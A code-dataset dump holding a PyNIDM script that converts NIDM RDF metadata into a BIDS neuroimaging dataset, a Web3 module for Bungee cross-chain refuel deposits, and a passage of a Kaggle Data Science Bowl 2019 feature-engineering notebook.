qres = nidm_graph.query(query)\n\n for row in qres:\n # use last field in URIs for short column name and add full URI to sidecar participants.json file\n url_parts = urllib.parse.urlsplit(row[0], scheme=\"#\")\n\n if url_parts.fragment == \"\":\n # do some parsing of the path URL because this particular one has no fragments\n url_parts = urllib.parse.urlparse(row[0])\n path_parts = url_parts[2].rpartition(\"/\")\n short_name = path_parts[2]\n else:\n short_name = url_parts.fragment\n\n # find Data Element and add metadata to participants_json dictionary\n if \"de\" not in locals():\n de = GetDataElementMetadata(nidm_graph, short_name)\n else:\n de.update(GetDataElementMetadata(nidm_graph, short_name))\n\n participants.loc[row_index, str(short_name)] = str(row[1])\n # data.append(str(row[1]))\n\n # add row to participants DataFrame\n # participants=participants.append(pd.DataFrame(data))\n row_index += 1\n\n # save participants.tsv file\n participants.to_csv(output_file + \".tsv\", sep=\"\\t\", index=False)\n # save participants.json file\n with open(output_file + \".json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(participants_json, f, sort_keys=True, indent=2)\n\n # save participant sidecar file\n write_json_mapping_file(de, join(splitext(output_file)[0] + \".json\"), True)\n\n return participants, participants_json\n\n\ndef NIDMProject2BIDSDatasetDescriptor(nidm_graph, output_directory):\n \"\"\"\n :param nidm_graph: RDFLib graph object from NIDM-Exp file\n :param output_dir: directory for writing dataset_description of BIDS dataset\n :return: None\n \"\"\"\n\n print(\"Creating dataset_description.json file...\")\n\n # Project -> Dataset_description.json############################################\n # get json representation of project metadata\n project_metadata = nidm_graph.get_metadata_dict(Constants.NIDM_PROJECT)\n # print(project_metadata)\n\n # cycle through keys converting them to BIDS keys\n # make copy of project_metadata\n project_metadata_tmp = dict(project_metadata)\n # iterate over the temporary dictionary and delete items from the original\n for proj_key in project_metadata_tmp:\n key_found = 0\n # print(f\"proj_key = {proj_key} \")\n # print(f\"project_metadata[proj_key] = {project_metadata[proj_key]}\")\n\n for key, value in BIDS_Constants.dataset_description.items():\n if value._uri == proj_key:\n # added since BIDS validator validates values of certain keys\n if key in (\"Authors\", \"Funding\", \"ReferencesAndLinks\"):\n project_metadata[key] = [project_metadata[proj_key]]\n else:\n project_metadata[key] = project_metadata[proj_key]\n del project_metadata[proj_key]\n key_found = 1\n continue\n # if this proj_key wasn't found in BIDS dataset_description Constants dictionary then delete it\n if not key_found:\n del project_metadata[proj_key]\n\n with open(\n join(output_directory, \"dataset_description.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(project_metadata, f, sort_keys=True, indent=2)\n\n\ndef AddMetadataToImageSidecar(graph_entity, graph, output_directory, image_filename):\n \"\"\"\n This function will query the metadata in graph_entity and compare the entries with mappings in\n core/BIDS_Constants.py json_keys where we'll be mapping the value (NIDM entry) to key (BIDS key). It\n will create the appropriate sidecar json file associated with image_filename in output_directory.\n \"\"\"\n\n # query graph for metadata associated with graph_entity\n query = f\"\"\"\n Select DISTINCT ?p ?o\n WHERE {{\n <{graph_entity}> ?p ?o .\n }}\n \"\"\"\n qres = graph.query(query)\n\n # dictionary to store metadata\n json_dict = {}\n for row in qres:\n key = next(\n (k for k, v in BIDS_Constants.json_keys.items() if v == row[0]),\n None,\n )\n if key is not None:\n json_dict[key] = row[1]\n\n # write json_dict out to appropriate sidecar filename\n with open(\n join(output_directory, image_filename + \".json\"), \"w\", encoding=\"utf-8\"\n ) as fp:\n json.dump(json_dict, fp, indent=2)\n\n\ndef ProcessFiles(graph, scan_type, output_directory, project_location, args):\n \"\"\"\n This function will essentially cycle through the acquisition objects in the NIDM file loaded into graph\n and depending on the scan_type will try and copy the image to the output_directory\n \"\"\"\n\n if scan_type == Constants.NIDM_MRI_DIFFUSION_TENSOR.uri:\n bids_ext = \"dwi\"\n elif scan_type == Constants.NIDM_MRI_ANATOMIC_SCAN.uri:\n bids_ext = \"anat\"\n elif scan_type == Constants.NIDM_MRI_FUNCTION_SCAN.uri:\n bids_ext = \"func\"\n\n # query NIDM document for acquisition entity \"subjects\" with predicate nidm:hasImageUsageType and object scan_type\n for acq in graph.subjects(\n predicate=URIRef(Constants.NIDM_IMAGE_USAGE_TYPE.uri), object=URIRef(scan_type)\n ):\n # first see if file exists locally. Get nidm:Project prov:Location and append the nfo:Filename of the image\n # from the acq acquisition entity. If that file doesn't exist try the prov:Location in the func acq\n # entity and see if we can download it from the cloud\n\n # get acquisition uuid from entity uuid\n temp = graph.objects(subject=acq, predicate=Constants.PROV[\"wasGeneratedBy\"])\n for item in temp:\n activity = item\n # get participant ID with sio:Subject role in anat_acq qualified association\n part_id = GetParticipantIDFromAcquisition(\n nidm_file_list=[args.rdf_file], acquisition=activity\n )\n\n # make BIDS sub directory\n if \"sub\" in (part_id[\"ID\"].values)[0]:\n sub_dir = join(output_directory, (part_id[\"ID\"].values)[0])\n else:\n sub_dir = join(output_directory, \"sub-\" + (part_id[\"ID\"].values)[0])\n sub_filename_base = \"sub-\" + (part_id[\"ID\"].values)[0]\n if not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n\n # make BIDS scan type directory (bids_ext) directory\n if not os.path.exists(join(sub_dir, bids_ext)):\n os.makedirs(join(sub_dir, bids_ext))\n\n for filename in graph.objects(\n subject=acq, predicate=URIRef(Constants.NIDM_FILENAME.uri)\n ):\n # check if file exists\n for location in project_location:\n # if MRI exists in this location then copy and rename\n if isfile((location[0] + filename).lstrip(\"file:\")):\n # copy and rename file to be BIDS compliant\n copyfile(\n (location[0] + filename).lstrip(\"file:\"),\n join(\n sub_dir, bids_ext, sub_filename_base + splitext(filename)[1]\n ),\n )\n continue\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=acq, predicate=URIRef(Constants.PROV[\"Location\"])\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(filename),\n ),\n )\n\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(filename),\n ),\n args=args,\n )\n\n else:\n # copy temporary file to BIDS directory\n copyfile(\n ret,\n join(output_directory, sub_dir, bids_ext, basename(filename)),\n )\n\n # if we were able to copy the image file then add the json sidecar file with additional metadata\n # available in the NIDM file\n if isfile(\n join(output_directory, sub_dir, bids_ext, basename(filename))\n ):\n # get rest of metadata for this acquisition and store in sidecar file\n if \"gz\" in basename(filename):\n image_filename = splitext(splitext(basename(filename))[0])[0]\n else:\n image_filename = splitext(basename(filename))[0]\n AddMetadataToImageSidecar(\n graph_entity=acq,\n graph=graph,\n output_directory=join(output_directory, sub_dir, bids_ext),\n image_filename=image_filename,\n )\n\n # if this is a DWI scan then we should copy over the b-value and b-vector files\n if bids_ext == \"dwi\":\n # search for entity uuid with rdf:type nidm:b-value that was generated by activity\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX nidm: \n\n SELECT DISTINCT ?entity\n WHERE {{\n ?entity rdf:type ;\n prov:wasGeneratedBy <{activity}> .\n }}\"\"\"\n # print(query)\n qres = graph.query(query)\n\n for row in qres:\n bval_entity = str(row[0])\n\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=URIRef(bval_entity),\n predicate=URIRef(Constants.PROV[\"Location\"]),\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n )\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n args=args,\n )\n # search for entity uuid with rdf:type nidm:b-value that was generated by activity\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX nidm: \n\n SELECT DISTINCT ?entity\n WHERE {{\n ?entity rdf:type ;\n prov:wasGeneratedBy <{activity}> .\n }}\"\"\"\n # print(query)\n qres = graph.query(query)\n\n for row in qres:\n bvec_entity = str(row[0])\n\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=URIRef(bvec_entity),\n predicate=URIRef(Constants.PROV[\"Location\"]),\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n )\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n args=args,\n )\n\n\ndef main():\n parser = ArgumentParser(\n description=\"This program will convert a NIDM-Experiment RDF document \\\n to a BIDS dataset. The program will query the NIDM-Experiment document for subjects, \\\n MRI scans, and associated assessments saving the MRI data to disk in an organization \\\n according to the BIDS specification, metadata to a participants.tsv \\\n file, the project-level metadata to a dataset_description.json file, and the \\\n assessments to *.tsv/*.json file pairs in a phenotypes directory.\",\n epilog=\"Example of use: \\\n NIDM2BIDSMRI.py -nidm_file NIDM.ttl -part_fields age,gender -bids_dir BIDS\",\n )\n\n parser.add_argument(\n \"-nidm_file\", dest=\"rdf_file\", required=True, help=\"NIDM RDF file\"\n )\n parser.add_argument(\n \"-part_fields\",\n nargs=\"+\",\n dest=\"part_fields\",\n required=False,\n help=\"Variables to add to BIDS participant file. Variables will be fuzzy-matched to NIDM URIs\",\n )\n parser.add_argument(\n \"-anat\",\n dest=\"anat\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add anatomical scans to BIDS dataset\",\n )\n parser.add_argument(\n \"-func\",\n dest=\"func\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add functional scans + events files to BIDS dataset\",\n )\n parser.add_argument(\n \"-dwi\",\n dest=\"dwi\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add DWI scans + Bval/Bvec files to BIDS dataset\",\n )\n parser.add_argument(\n \"-bids_dir\",\n dest=\"bids_dir\",\n required=True,\n help=\"Directory to store BIDS dataset\",\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"-no_downloads\",\n dest=\"no_downloads\",\n action=\"store_true\",\n required=False,\n help=\"If this flag is set then script won't attempt to download images using datalad\"\n \"and AWS S3. Default behavior is files are downloaded if they don't exist locally.\",\n )\n group.add_argument(\n \"-aws_url\",\n dest=\"aws_url\",\n required=False,\n help=\"This tool facilities export of \"\n \"user-selected information from a NIDM file to a BIDS dataset and may have to fetch images. The NIDM files contain links from\"\n \"the local filesystem used to convert BIDS to NIDM and possibly DataLad dataset links to the files if the\"\n \" original BIDS data was a DataLad dataset. Here we support 3 modes of trying to find images: (1) copy from\"\n \" the local directory space using the prov:Location information in the NIDM file; (2) fetch the images from\"\n \" a DataLad remote if the original BIDS dataset was a DataLad dataset when bids2nidm was run; (3) attempt \"\n \" to download the images via a AWS S3 link. This parameter lets the user set the base AWS S3 URL to try and\"\n \" find the images. Currently it supports using the URL provided here and adding the dataset id, subject id,\"\n \" and filename. For example, in OpenNeuro (OpenNeuro is supported by default but will serve as an example) the base AWS S3\"\n \" URL is 's3://openneuro.org'. The URL then becomes (for example) \"\n \" s3://openneuro.org/ds000002/sub-06/func/sub-06_task-probabilisticclassification_run-02_bold.nii.gz where this tool\"\n \" has added 'ds000002/sub-06/[FILENAME] to the base AWS S3 URL.\",\n )\n parser.add_argument(\n \"-dataset_string\",\n dest=\"dataset_string\",\n required=False,\n help=\"If -aws_url parameter is supplied\"\n \" this parameter (-dataset_string) is required as it will be added to the aws_baseurl to retrieve images for each\"\n \" subject and file. For example, if -aws_baseurl is 's3://davedata.org ' and -dataset_string is 'dataset1' then\"\n \" the AWS S3 url for sub-1 and file sub1-task-rest_run-1_bold.nii.gz would be: \"\n \" 's3://davedata.org/dataset1/sub-1/[anat | func | dwi/sub1-task-rest_run-1_bold.nii.gz'\",\n )\n\n args = parser.parse_args()\n\n # check some argument dependencies\n if args.aws_url and not args.dataset_string:\n print(\n \"ERROR! You must include a -dataset_string if you supplied the -aws_baseurl. If there is no dataset\"\n \" string in your AWS S3 urls then just supply -aws_baseurl with nothing after it.\"\n )\n print(args.print_help())\n sys.exit(-1)\n\n # set up some local variables\n rdf_file = args.rdf_file\n output_directory = args.bids_dir\n\n # check if output directory exists, if not create it\n if not isdir(output_directory):\n mkdir(path=output_directory)\n\n # try to read RDF file\n print(\"Guessing RDF file format...\")\n format_found = False\n for fmt in \"turtle\", \"xml\", \"n3\", \"trix\", \"rdfa\":\n try:\n print(f\"Reading RDF file as {fmt}...\")\n # load NIDM graph into NIDM-Exp API objects\n nidm_project = read_nidm(rdf_file)\n # temporary save nidm_project\n with open(\"/Users/dbkeator/Downloads/nidm.ttl\", \"w\", encoding=\"utf-8\") as f:\n print(nidm_project.serializeTurtle(), file=f)\n print(\"RDF file successfully read\")\n format_found = True\n break\n except Exception:\n print(f\"File: {rdf_file} appears to be an invalid {fmt} RDF file\")\n\n if not format_found:\n print(\n \"File doesn't appear to be a valid RDF format supported by Python RDFLib! Please check input file\"\n )\n print(\"exiting...\")\n sys.exit(-1)\n\n # if not os.path.isdir(join(output_directory,os.path.splitext(args.rdf_file)[0])):\n # os.mkdir(join(output_directory,os.path.splitext(args.rdf_file)[0]))\n\n # convert Project NIDM object -> dataset_description.json file\n NIDMProject2BIDSDatasetDescriptor(nidm_project, output_directory)\n\n # create participants.tsv file. In BIDS datasets there is no specification for how many or which type of assessment\n # variables might be in this file. The specification does mention a minimum participant_id which indexes each of the\n # subjects in the BIDS dataset.\n #\n # if parameter -parts_field is defined then the variables listed will be fuzzy matched to the URIs in the NIDM file\n # and added to the participants.tsv file\n\n # use RDFLib here for temporary graph making query easier\n rdf_graph = Graph()\n rdf_graph_parse = rdf_graph.parse(\n source=StringIO(nidm_project.serializeTurtle()), format=\"turtle\"\n )\n\n # temporary write out turtle file for testing\n # rdf_graph_parse.serialize(destination=\"/Users/dbkeator/Downloads/ds000117.ttl\", format='turtle')\n\n # create participants file\n CreateBIDSParticipantFile(\n rdf_graph_parse, join(output_directory, \"participants\"), args.part_fields\n )\n\n # get nidm:Project prov:Location\n # first get nidm:Project UUIDs\n project_uuid = GetProjectsUUID([rdf_file], output_file=None)\n project_location = []\n for uuid in project_uuid:\n project_location.append(\n GetProjectLocation(nidm_file_list=[rdf_file], project_uuid=uuid)\n )\n\n # creating BIDS hierarchy with requested scans\n if args.anat is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_ANATOMIC_SCAN.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n\n if args.func is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_FUNCTION_SCAN.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n if args.dwi is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_DIFFUSION_TENSOR.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"incf-nidash/PyNIDM","sub_path":"src/nidm/experiment/tools/nidm2bids.py","file_name":"nidm2bids.py","file_ext":"py","file_size_in_byte":40525,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"33769048787","text":"import random\nfrom typing import Union\n\nfrom loguru import logger\nfrom web3 import Web3\nfrom config import BUNGEE_ABI, BUNGEE_CONTRACT\nfrom .account import Account\nfrom utils.bungee_data import get_bungee_data\n\n\ndef get_bungee_limits() -> Union[dict, bool]:\n bungee_data = get_bungee_data()\n\n try:\n limits = [chain_data for chain_data in bungee_data if chain_data[\"name\"] == \"Base\"][0][\"limits\"]\n\n return limits\n except:\n return False\n\n\nclass Bungee(Account):\n def __init__(self, account_id: int, private_key: str) -> None:\n super().__init__(account_id=account_id, private_key=private_key, chain=\"base\")\n\n self.contract = self.get_contract(BUNGEE_CONTRACT, BUNGEE_ABI)\n self.chain_ids = {\n \"BSC\": 56,\n \"OPTIMISM\": 10,\n \"GNOSIS\": 100,\n \"POLYGON\": 137,\n \"ZKSYNC\": 324,\n \"ARBITRUM\": 42161,\n \"AVALANCHE\": 43114,\n \"AURORA\": 1313161554,\n \"ZK_EVM\": 1101,\n }\n\n def get_tx_data(self, amount: int):\n tx = {\n \"from\": self.address,\n \"gasPrice\": self.w3.eth.gas_price,\n \"nonce\": self.w3.eth.get_transaction_count(self.address),\n \"value\": amount\n }\n return tx\n\n def refuel(self, chain_list: list, random_amount: bool):\n limits = get_bungee_limits()\n\n to_chain = random.choice(chain_list)\n\n try:\n to_chain_limits = [\n chain for chain in limits if chain[\"chainId\"] == self.chain_ids[to_chain] and chain[\"isEnabled\"]\n ]\n\n if to_chain_limits:\n min_amount = int(to_chain_limits[0][\"minAmount\"])\n max_amount = int(to_chain_limits[0][\"maxAmount\"])\n\n amount = random.randint(min_amount, max_amount) if random_amount else min_amount\n\n logger.info(\n f\"[{self.account_id}][{self.address}] Make refuel to \" +\n f\"{to_chain.title()} | {Web3.from_wei(amount, 'ether')} ETH\"\n )\n\n transaction = self.contract.functions.depositNativeToken(\n self.chain_ids[to_chain],\n self.address\n ).build_transaction(self.get_tx_data(amount))\n\n signed_txn = self.sign(transaction)\n\n txn_hash = self.send_raw_transaction(signed_txn)\n\n self.wait_until_tx_finished(txn_hash.hex())\n else:\n logger.error(f\"[{self.account_id}][{self.address}] Bungee refuel destination chain inactive!\")\n except Exception as e:\n logger.error(f\"[{self.account_id}][{self.address}] Bungee refuel error | error {e}\")\n","repo_name":"Samogonshikua/BASE.","sub_path":"modules/bungee.py","file_name":"bungee.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71050282171","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport matplotlib.pyplot as plt\n\nimport xgboost as xgb\n\nfrom xgboost import XGBClassifier, XGBRegressor\n\nfrom xgboost import plot_importance\n\nfrom matplotlib import pyplot\n\n#import shap\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n for filename in filenames:\n\n print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\n\nfrom time import time\n\nfrom tqdm import tqdm_notebook as tqdm\n\nfrom collections import Counter\n\nfrom scipy import stats\n\nimport lightgbm as lgb\n\nfrom sklearn.metrics import cohen_kappa_score\n\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nimport gc\n\nimport json\n\npd.set_option('display.max_columns', 1000)\ndef eval_qwk_lgb_regr(y_true, y_pred):\n\n \"\"\"\n\n Fast cappa eval function for lgb.\n\n \"\"\"\n\n dist = Counter(reduce_train['accuracy_group'])\n\n for k in dist:\n\n dist[k] /= len(reduce_train)\n\n reduce_train['accuracy_group'].hist()\n\n \n\n acum = 0\n\n bound = {}\n\n for i in range(3):\n\n acum += dist[i]\n\n bound[i] = np.percentile(y_pred, acum * 100)\n\n\n\n def classify(x):\n\n if x <= bound[0]:\n\n return 0\n\n elif x <= bound[1]:\n\n return 1\n\n elif x <= bound[2]:\n\n return 2\n\n else:\n\n return 3\n\n\n\n y_pred = np.array(list(map(classify, y_pred))).reshape(y_true.shape)\n\n\n\n return 'cappa', cohen_kappa_score(y_true, y_pred, weights='quadratic'), True\ndef cohenkappa(ypred, y):\n\n y = y.get_label().astype(\"int\")\n\n ypred = ypred.reshape((4, -1)).argmax(axis = 0)\n\n loss = cohenkappascore(y, y_pred, weights = 'quadratic')\n\n return \"cappa\", loss, True\ndef read_data():\n\n print('Reading train.csv file....')\n\n train = pd.read_csv('../input/data-science-bowl-2019/train.csv')\n\n print('Training.csv file have {} rows and {} columns'.format(train.shape[0], train.shape[1]))\n\n\n\n print('Reading test.csv file....')\n\n test = pd.read_csv('../input/data-science-bowl-2019/test.csv')\n\n print('Test.csv file have {} rows and {} columns'.format(test.shape[0], test.shape[1]))\n\n\n\n print('Reading train_labels.csv file....')\n\n train_labels = pd.read_csv('../input/data-science-bowl-2019/train_labels.csv')\n\n print('Train_labels.csv file have {} rows and {} columns'.format(train_labels.shape[0], train_labels.shape[1]))\n\n\n\n print('Reading specs.csv file....')\n\n specs = pd.read_csv('../input/data-science-bowl-2019/specs.csv')\n\n print('Specs.csv file have {} rows and {} columns'.format(specs.shape[0], specs.shape[1]))\n\n\n\n print('Reading sample_submission.csv file....')\n\n sample_submission = pd.read_csv('../input/data-science-bowl-2019/sample_submission.csv')\n\n print('Sample_submission.csv file have {} rows and {} columns'.format(sample_submission.shape[0], sample_submission.shape[1]))\n\n return train, test, train_labels, specs, sample_submission\ndef encode_title(train, test, train_labels):\n\n # encode title\n\n train['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), train['title'], train['event_code']))\n\n test['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), test['title'], test['event_code']))\n\n all_title_event_code = list(set(train[\"title_event_code\"].unique()).union(test[\"title_event_code\"].unique()))\n\n # make a list with all the unique 'titles' from the train and test set\n\n list_of_user_activities = list(set(train['title'].unique()).union(set(test['title'].unique())))\n\n # make a list with all the unique 'event_code' from the train and test set\n\n list_of_event_code = list(set(train['event_code'].unique()).union(set(test['event_code'].unique())))\n\n list_of_event_id = list(set(train['event_id'].unique()).union(set(test['event_id'].unique())))\n\n # make a list with all the unique worlds from the train and test set\n\n list_of_worlds = list(set(train['world'].unique()).union(set(test['world'].unique())))\n\n # create a dictionary numerating the titles\n\n activities_map = dict(zip(list_of_user_activities, np.arange(len(list_of_user_activities))))\n\n activities_labels = dict(zip(np.arange(len(list_of_user_activities)), list_of_user_activities))\n\n activities_world = dict(zip(list_of_worlds, np.arange(len(list_of_worlds))))\n\n assess_titles = list(set(train[train['type'] == 'Assessment']['title'].value_counts().index).union(set(test[test['type'] == 'Assessment']['title'].value_counts().index)))\n\n # replace the text titles with the number titles from the dict\n\n train['title'] = train['title'].map(activities_map)\n\n test['title'] = test['title'].map(activities_map)\n\n train['world'] = train['world'].map(activities_world)\n\n test['world'] = test['world'].map(activities_world)\n\n train_labels['title'] = train_labels['title'].map(activities_map)\n\n win_code = dict(zip(activities_map.values(), (4100*np.ones(len(activities_map))).astype('int')))\n\n # then, it set one element, the 'Bird Measurer (Assessment)' as 4110, 10 more than the rest\n\n win_code[activities_map['Bird Measurer (Assessment)']] = 4110\n\n # convert text into datetime\n\n train['timestamp'] = pd.to_datetime(train['timestamp'])\n\n test['timestamp'] = pd.to_datetime(test['timestamp'])\n\n \n\n \n\n return train, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code\n# this is the function that convert the raw data into processed features\n\ndef get_data(user_sample, test_set=False):\n\n '''\n\n The user_sample is a DataFrame from train or test where the only one \n\n installation_id is filtered\n\n And the test_set parameter is related with the labels processing, that is only requered\n\n if test_set=False\n\n '''\n\n # Constants and parameters declaration\n\n last_activity = 0\n\n \n\n user_activities_count = {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}\n\n \n\n # new features: time spent in each activity\n\n last_session_time_sec = 0\n\n accuracy_groups = {0:0, 1:0, 2:0, 3:0}\n\n all_assessments = []\n\n accumulated_accuracy_group = 0\n\n accumulated_accuracy = 0\n\n accumulated_correct_attempts = 0 \n\n accumulated_uncorrect_attempts = 0\n\n accumulated_actions = 0\n\n counter = 0\n\n time_first_activity = float(user_sample['timestamp'].values[0])\n\n durations = []\n\n last_accuracy_title = {'acc_' + title: -1 for title in assess_titles}\n\n event_code_count: Dict[str, int] = {ev: 0 for ev in list_of_event_code}\n\n event_id_count: Dict[str, int] = {eve: 0 for eve in list_of_event_id}\n\n title_count: Dict[str, int] = {eve: 0 for eve in activities_labels.values()} \n\n title_event_code_count: Dict[str, int] = {t_eve: 0 for t_eve in all_title_event_code}\n\n \n\n # last features\n\n sessions_count = 0\n\n \n\n # itarates through each session of one instalation_id\n\n for i, session in user_sample.groupby('game_session', sort=False):\n\n # i = game_session_id\n\n # session is a DataFrame that contain only one game_session\n\n \n\n # get some sessions information\n\n session_type = session['type'].iloc[0]\n\n session_title = session['title'].iloc[0]\n\n session_title_text = activities_labels[session_title]\n\n \n\n \n\n # for each assessment, and only this kind off session, the features below are processed\n\n # and a register are generated\n\n if (session_type == 'Assessment') & (test_set or len(session)>1):\n\n # search for event_code 4100, that represents the assessments trial\n\n all_attempts = session.query(f'event_code == {win_code[session_title]}')\n\n # then, check the numbers of wins and the number of losses\n\n true_attempts = all_attempts['event_data'].str.contains('true').sum()\n\n false_attempts = all_attempts['event_data'].str.contains('false').sum()\n\n # copy a dict to use as feature template, it's initialized with some itens: \n\n # {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}\n\n features = user_activities_count.copy()\n\n features.update(last_accuracy_title.copy())\n\n features.update(event_code_count.copy())\n\n features.update(event_id_count.copy())\n\n features.update(title_count.copy())\n\n features.update(title_event_code_count.copy())\n\n features.update(last_accuracy_title.copy())\n\n features['installation_session_count'] = sessions_count\n\n \n\n # get installation_id for aggregated features\n\n features['installation_id'] = session['installation_id'].iloc[-1]\n\n # add title as feature, remembering that title represents the name of the game\n\n features['session_title'] = session['title'].iloc[0]\n\n # the 4 lines below add the feature of the history of the trials of this player\n\n # this is based on the all time attempts so far, at the moment of this assessment\n\n features['accumulated_correct_attempts'] = accumulated_correct_attempts\n\n features['accumulated_uncorrect_attempts'] = accumulated_uncorrect_attempts\n\n accumulated_correct_attempts += true_attempts \n\n accumulated_uncorrect_attempts += false_attempts\n\n # the time spent in the app so far\n\n if durations == []:\n\n features['duration_mean'] = 0\n\n features['duration_std'] = 0\n\n else:\n\n features['duration_mean'] = np.mean(durations)\n\n features['duration_std'] = np.std(durations)\n\n durations.append((session.iloc[-1, 2] - session.iloc[0, 2] ).seconds)\n\n # the accurace is the all time wins divided by the all time attempts\n\n features['accumulated_accuracy'] = accumulated_accuracy/counter if counter > 0 else 0\n\n accuracy = true_attempts/(true_attempts+false_attempts) if (true_attempts+false_attempts) != 0 else 0\n\n accumulated_accuracy += accuracy\n\n last_accuracy_title['acc_' + session_title_text] = accuracy\n\n # a feature of the current accuracy categorized\n\n # it is a counter of how many times this player was in each accuracy group\n\n if accuracy == 0:\n\n features['accuracy_group'] = 0\n\n elif accuracy == 1:\n\n features['accuracy_group'] = 3\n\n elif accuracy == 0.5:\n\n features['accuracy_group'] = 2\n\n else:\n\n features['accuracy_group'] = 1\n\n features.update(accuracy_groups)\n\n accuracy_groups[features['accuracy_group']] += 1\n\n # mean of the all accuracy groups of this player\n\n features['accumulated_accuracy_group'] = accumulated_accuracy_group/counter if counter > 0 else 0\n\n accumulated_accuracy_group += features['accuracy_group']\n\n # how many actions the player has done so far, it is initialized as 0 and updated some lines below\n\n features['accumulated_actions'] = accumulated_actions\n\n \n\n # there are some conditions to allow this features to be inserted in the datasets\n\n # if it's a test set, all sessions belong to the final dataset\n\n # it it's a train, needs to be passed throught this clausule: session.query(f'event_code == {win_code[session_title]}')\n\n # that means, must exist an event_code 4100 or 4110\n\n if test_set:\n\n all_assessments.append(features)\n\n elif true_attempts+false_attempts > 0:\n\n all_assessments.append(features)\n\n \n\n counter += 1\n\n \n\n sessions_count += 1\n\n # this piece counts how many actions was made in each event_code so far\n\n def update_counters(counter: dict, col: str):\n\n num_of_session_count = Counter(session[col])\n\n for k in num_of_session_count.keys():\n\n x = k\n\n if col == 'title':\n\n x = activities_labels[k]\n\n counter[x] += num_of_session_count[k]\n\n return counter\n\n \n\n event_code_count = update_counters(event_code_count, \"event_code\")\n\n event_id_count = update_counters(event_id_count, \"event_id\")\n\n title_count = update_counters(title_count, 'title')\n\n title_event_code_count = update_counters(title_event_code_count, 'title_event_code')\n\n\n\n # counts how many actions the player has done so far, used in the feature of the same name\n\n accumulated_actions += len(session)\n\n if last_activity != session_type:\n\n user_activities_count[session_type] += 1\n\n last_activitiy = session_type \n\n \n\n # if it't the test_set, only the last assessment must be 